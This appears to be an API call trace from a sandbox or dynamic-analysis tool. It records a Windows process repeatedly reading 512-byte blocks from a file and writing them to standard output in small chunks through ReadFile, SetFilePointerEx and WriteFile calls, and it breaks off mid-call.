[0127.270] GetFileType (hFile=0x50) returned 0x1 [0127.270] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.270] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.271] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.271] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, 
lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] GetFileType (hFile=0x50) returned 0x1 [0127.271] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.271] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.272] GetFileType (hFile=0x50) returned 0x1 [0127.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.272] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: 
lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.272] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.272] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.272] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.272] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.272] GetFileType (hFile=0x50) returned 0x1 [0127.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.272] GetFileType (hFile=0x50) returned 0x1 [0127.272] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.272] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] GetFileType (hFile=0x50) returned 0x1 [0127.275] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.275] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.276] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.276] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] 
GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 
[0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] GetFileType (hFile=0x50) returned 0x1 [0127.276] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.276] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.277] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.277] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] GetFileType (hFile=0x50) returned 0x1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.277] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.277] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.278] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.278] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType 
(hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.278] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.278] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.279] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.279] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.279] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, 
lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.279] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.279] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18ecec*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ecec*, lpNumberOfBytesWritten=0x18dcf0*=0x20, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.280] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18dcdc | out: lpNewFilePointer=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=4) returned 0x58 [0127.280] ReadFile (in: hFile=0x58, lpBuffer=0x18eb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18dcfc, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesRead=0x18dcfc*=0x200, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18eb0c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb0c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 
[0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18eb5c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18eb5c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18ebac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebac*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18ebfc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ebfc*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18ec4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec4c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] WriteFile (in: hFile=0x50, lpBuffer=0x18ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18dcf0, lpOverlapped=0x0 | out: lpBuffer=0x18ec9c*, lpNumberOfBytesWritten=0x18dcf0*=0x50, lpOverlapped=0x0) returned 1 [0127.280] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.280] GetFileType (hFile=0x50) returned 0x1 [0127.281] _get_osfhandle (_FileHandle=1) returned 0x50 [0127.281] WriteFile (in: hFile=0x50, 
